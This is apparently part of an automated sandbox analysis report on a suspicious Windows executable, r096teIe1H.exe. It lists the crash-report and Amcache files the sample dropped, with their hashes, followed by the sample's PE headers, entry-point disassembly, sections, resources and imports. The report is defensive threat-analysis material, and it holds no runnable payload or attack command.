SHA-256:	99834DDBD4BF11E65EFF302CF49DA4F57FB4C3A5AD5718250B49690A334CBF0E
SHA-512:	4A8C1D9F7377E08D602F6DD84CFE59011EC3F05A0D1997957D88BB796D34540C3CB5B5688D7B9072DF24E61417EF5ED5F8E0FDC1D037D3D586435B0005CAAE58
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.3.3.7.2.8.7.7.5.0.9.1.3.0.3.1.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.3.7.2.8.7.7.5.2.4.7.2.9.9.5.4.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.b.f.9.a.d.6.3.b.-.5.3.4.d.-.4.f.a.1.-.a.0.b.a.-.8.f.4.6.7.f.7.d.f.6.f.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.9.4.2.0.a.1.8.-.8.b.5.d.-.4.8.6.9.-.8.5.f.3.-.6.b.9.f.3.7.d.4.9.8.f.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.0.9.6.t.e.I.e.1.H...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.3.0.-.0.0.0.1.-.0.0.2.6.-.c.b.3.9.-.b.2.e.3.e.c.d.5.d.9.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.5.0.f.4.d.d.5.6.9.c.e.5.0.3.5.8.5.a.8.d.4.3.a.7.0.0.2.6.8.5.9.5.0.0.0.0.f.f.f.f.!.0.0.0.0.7.f.5.9.9.1.e.1.e.2.4.a.2.9.e.f.f.5.f.a.d.6.2.b.3.3.e.0.5.f.c.f.f.2.e.b.0.9.8.8.!.r.0.9.6.t.e.I.e.1.H...e.x.e.....T.a.r.g.e.t.A.p.p.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER64AC.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 15 streams, Wed Aug 23 18:09:12 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	121322
Entropy (8bit):	2.1274134830027336
Encrypted:	false
SSDEEP:	384:PINoqTkAztFtepHTy2EPzWnNwa5WgbFnF4tyx8Z/w1cRopo7QDjms9R:Mbvtep0anNiynx001u7G/9
MD5:	145C5FD7A6BCF53A66111C80A0882C19
SHA1:	FFF5CE27D3AD9F82C77C710D90801024CB27A4BF
SHA-256:	624DC1C567B61DAF708B6CA69FEE960FC39BA6DD2E4F3FA446BAA2E4123D6099
SHA-512:	69C05DE7192F1C7C63D56C30A889C302D907DA8C944C8EEEC3EEE8429F0A4A4194F48117172294392265886CA916A0DE6B0488134799DCED11E489CC460F7ECE
Malicious:	false
Reputation:	low
Preview:	MDMP....... .......HK.d............D...............X...........\$......d...D_..........`.......8...........T...........P=..............h*..........T,...................................................................U...........B.......,......GenuineIntelW...........T.......0...;K.d.............................0..2...............W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.........................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER69ED.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8340
Entropy (8bit):	3.701237185249798
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiDVL6Sm6YiijSUfdxgmfBP4p8Sc+prj89brHsfww5m:RrlsNiDp6Sm6YzSUfbgmfBP4+SkrMfwT
MD5:	C42EE0919B96829853B7E729CA5094EF
SHA1:	1E66EE5A599DB255BCB908F1D8C50F044769D53B
SHA-256:	73F337092413A056BED16FDCE087AE4EB5DDC5BE06BDC827EA1CCD55187F60E8
SHA-512:	911B8AF2C58951FD0B9A8A700BF00FF0F1B8EB85B982A259F5590A0E2BB2FD5040B67A4199573FD53467F673BEE3EF67D443F234FC16ACB7B564FBF24FEA8357
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.6.9.6.0.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6A3C.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4573
Entropy (8bit):	4.470307364998499
Encrypted:	false
SSDEEP:	48:cvIwSD8zssrJgtWI9yAu6Wgc8sqYjU8fm8M4JOlFeU+q8rzTDU6wd:uITf4TAu7grsqYtJbUqTY6wd
MD5:	603BBA611F6A96E560BE28DFFBD31A15
SHA1:	77FCB57E7DFC5BE387F002A94A0F4B3BD3BD5AF4
SHA-256:	8DDF15AF390DDE8EAFF226F4B7A53314BE0AC28D66298ED421FEECD941CE4726
SHA-512:	6C034A75C40CFD1AACF87305A49F732A6D3A783236EA81B05055A313C873DC6DE830E302CFF1194AE653643D2C59B86A2F12822FF2053921962A232A24388045
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="2186119" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.3732040366316545
Encrypted:	false
SSDEEP:	12288:UDvKaIKouQPGQsxTTb92xxQaMwPqnwDVb/cNtWuCX0FGshCMhgt5:AvKaIKouQPFsxTIVMn
MD5:	811E598E8B3BAEAF9733B88EAB2E6533
SHA1:	FF97E959F8E0AFAB7862FF8F20C850DF84C7EB1C
SHA-256:	90FD6B358C8C76D97A5665DB2B54DBBCA5892AC9D531F71ACAD918D660F14EA7
SHA-512:	AFAFA9D1D2E917C564013D148B63EF0AAFCBDA82D46DFA5F4EE6FB55261595DAC0287F5F659EF3CDE130065E963D89EE53B26EC1D6711DA17CE82DDE8C9955E2
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.J..................................................................................................................................................................................................................................................................................................................................................2l.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	4.108237839359084
Encrypted:	false
SSDEEP:	768:pS4AH5oC1Z/C2rTiMfLw3rT4NLDI/ldcc5+JrZPYuDRPJ:U1ui/sA
MD5:	6C619E3337E613A1AF489B9889C29FCA
SHA1:	4DC8870E5B540623EA24340F973A2EB6D42D5446
SHA-256:	A1C10DBD3FF69B452AF540CC50FA038AB1915ED640C5A637CF039D41EA3A1C62
SHA-512:	887C615F7A4CCC512698C592B5DD874AADFCD3A3BB82F13E3A2C6C6D493A341232B6274F3099261E2E81D11864BE4A1F5D308DDEF395C3A90EB42984254CB3C3
Malicious:	false
Reputation:	low
Preview:	regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.J..................................................................................................................................................................................................................................................................................................................................................4l.HvLE.n......Y..............KS....e.D.<C8.................0...............`... ..hbin................p.\..,..........nk,..\..........(........................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ..\.......... ........................... .......Z.......................Root........lf......Root....nk ..\...................................... ...............*...............DeviceCensus.......................vk..................WritePermissions

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.349529449609779
TrID:	Win32 Executable (generic) a (10002005/4) 99.66% Win32 Executable Delphi generic (14689/80) 0.15% Windows Screen Saver (13104/52) 0.13% Win16/32 Executable Delphi generic (2074/23) 0.02% Generic Win/DOS Executable (2004/3) 0.02%
File name:	r096teIe1H.exe
File size:	1'053'184 bytes
MD5:	b1e794e29881f56a4e9afa213d7c622d
SHA1:	7f5991e1e24a29eff5fad62b33e05fcff2eb0988
SHA256:	53e4ef9bed0e669de506d72e339fa3f36534aef9d10519491d0f0acea27b8841
SHA512:	bd9c2dd293c9d0282dcd1d53edc3919ce2d92fe43f451cc014324ce21c7f0fa14ee59099342adfb11e742eb7e7937f5eddef6ecc43bac129e42a62126de90276
SSDEEP:	24576:p9PSlSUTC5lG8Zj4BQG/AWgbPmEqE5pgixE7p:p9PUZT27j4aGoTlnpg
TLSH:	5C25C022B1A88473F1E71E34F98E6394981F7D211F74788366D27D8EBA76541B62C383
File Content Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7.......................................................................................................................................

File Icon


Icon Hash:	71f9919286b2a1a5

Static PE Info

General

Entrypoint:	0x460464
Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	eeb6f210c31e51d5b63be371278c03a3

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 004601C4h
call 00007F3C00D4D7FDh
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007F3C00D99105h
mov ecx, dword ptr [004EBC14h]
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045FF04h]
call 00007F3C00D99105h
mov eax, dword ptr [004EBB1Ch]
mov eax, dword ptr [eax]
call 00007F3C00D99179h
call 00007F3C00D4B420h
lea eax, dword ptr [eax+00h]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xed000	0x232c	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf9000	0xd600	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf2000	0x6c0c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0xf1000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5f4ac	0x5f600	False	0.5237011590760158	data	6.539693084964852	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA	0x61000	0x8acb4	0x8ae00	False	0.6662107617011701	data	7.528235634086147	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS	0xec000	0xd15	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xed000	0x232c	0x2400	False	0.3628472222222222	data	4.971041857999194	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xf0000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata	0xf1000	0x18	0x200	False	0.05078125	data	0.15842690200323517	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0xf2000	0x6c0c	0x6e00	False	0.6440340909090909	data	6.682368392261621	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0xf9000	0xd600	0xd600	False	0.1875	data	3.9582855006976745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_CURSOR	0xf9e98	0x134	Targa image data - Map 64 x 65536 x 1 +32 "\001"			0.38636363636363635
RT_CURSOR	0xf9fcc	0x134	data			0.4642857142857143
RT_CURSOR	0xfa100	0x134	data			0.4805194805194805
RT_CURSOR	0xfa234	0x134	data			0.38311688311688313
RT_CURSOR	0xfa368	0x134	data			0.36038961038961037
RT_CURSOR	0xfa49c	0x134	data			0.4090909090909091
RT_CURSOR	0xfa5d0	0x134	Targa image data - RGB 64 x 65536 x 1 +32 "\001"			0.4967532467532468
RT_BITMAP	0xfa704	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfa8d4	0x1e4	Device independent bitmap graphic, 36 x 19 x 4, image size 380			0.46487603305785125
RT_BITMAP	0xfaab8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.43103448275862066
RT_BITMAP	0xfac88	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39870689655172414
RT_BITMAP	0xfae58	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.4245689655172414
RT_BITMAP	0xfb028	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5021551724137931
RT_BITMAP	0xfb1f8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5064655172413793
RT_BITMAP	0xfb3c8	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb598	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.5344827586206896
RT_BITMAP	0xfb768	0x1d0	Device independent bitmap graphic, 36 x 18 x 4, image size 360			0.39655172413793105
RT_BITMAP	0xfb938	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5208333333333334
RT_BITMAP	0xfb9f8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42857142857142855
RT_BITMAP	0xfbad8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.4955357142857143
RT_BITMAP	0xfbbb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.38392857142857145
RT_BITMAP	0xfbc98	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4947916666666667
RT_BITMAP	0xfbd58	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.484375
RT_BITMAP	0xfbe18	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.42410714285714285
RT_BITMAP	0xfbef8	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.5104166666666666
RT_BITMAP	0xfbfb8	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.5
RT_BITMAP	0xfc098	0xe8	Device independent bitmap graphic, 16 x 16 x 4, image size 128	English	United States	0.4870689655172414
RT_BITMAP	0xfc180	0xc0	Device independent bitmap graphic, 16 x 11 x 4, image size 88, 16 important colors			0.4895833333333333
RT_BITMAP	0xfc240	0xe0	Device independent bitmap graphic, 16 x 15 x 4, image size 120, 16 important colors			0.3794642857142857
RT_ICON	0xfc320	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colors			0.2355595667870036
RT_ICON	0xfcbc8	0x6c8	Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colors			0.2805299539170507
RT_ICON	0xfd290	0x3a48	Device independent bitmap graphic, 60 x 120 x 32, image size 14880			0.052815013404825736
RT_ICON	0x100cd8	0x1a68	Device independent bitmap graphic, 40 x 80 x 32, image size 6720			0.09186390532544379
RT_ICON	0x102740	0x988	Device independent bitmap graphic, 24 x 48 x 32, image size 2400			0.20081967213114754
RT_ICON	0x1030c8	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 1088			0.3182624113475177
RT_DIALOG	0x103530	0x52	data			0.7682926829268293
RT_STRING	0x103584	0x308	data			0.43943298969072164
RT_STRING	0x10388c	0x1f0	data			0.4213709677419355
RT_STRING	0x103a7c	0x1c0	data			0.44419642857142855
RT_STRING	0x103c3c	0xdc	data			0.6
RT_STRING	0x103d18	0x2f4	data			0.4497354497354497
RT_STRING	0x10400c	0xdc	data			0.5863636363636363
RT_STRING	0x1040e8	0x10c	data			0.5746268656716418
RT_STRING	0x1041f4	0x33c	data			0.4311594202898551
RT_STRING	0x104530	0x3d4	data			0.3683673469387755
RT_STRING	0x104904	0x3a4	data			0.34763948497854075
RT_STRING	0x104ca8	0x3e8	data			0.384
RT_STRING	0x105090	0xf4	data			0.47540983606557374
RT_STRING	0x105184	0xc4	data			0.5663265306122449
RT_STRING	0x105248	0x2c0	data			0.4446022727272727
RT_STRING	0x105508	0x478	data			0.2928321678321678
RT_STRING	0x105980	0x3ac	data			0.37553191489361704
RT_STRING	0x105d2c	0x2d4	data			0.4046961325966851
RT_RCDATA	0x106000	0x10	data			1.5
RT_RCDATA	0x106010	0x368	data			0.6938073394495413
RT_RCDATA	0x106378	0x129	Delphi compiled form 'TForm1'			0.7878787878787878
RT_GROUP_CURSOR	0x1064a4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064b8	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.25
RT_GROUP_CURSOR	0x1064cc	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064e0	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x1064f4	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x106508	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_CURSOR	0x10651c	0x14	Lotus unknown worksheet or configuration, revision 0x1			1.3
RT_GROUP_ICON	0x106530	0x5a	data			0.8222222222222222

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetTickCount, QueryPerformanceCounter, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryExA, LoadLibraryW, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleW, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCurrentProcess, GetComputerNameA, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, ExitProcess, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsMenu, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerA, CharUpperBuffA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayGetElement, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopyInd, VariantCopy, VariantClear, VariantInit
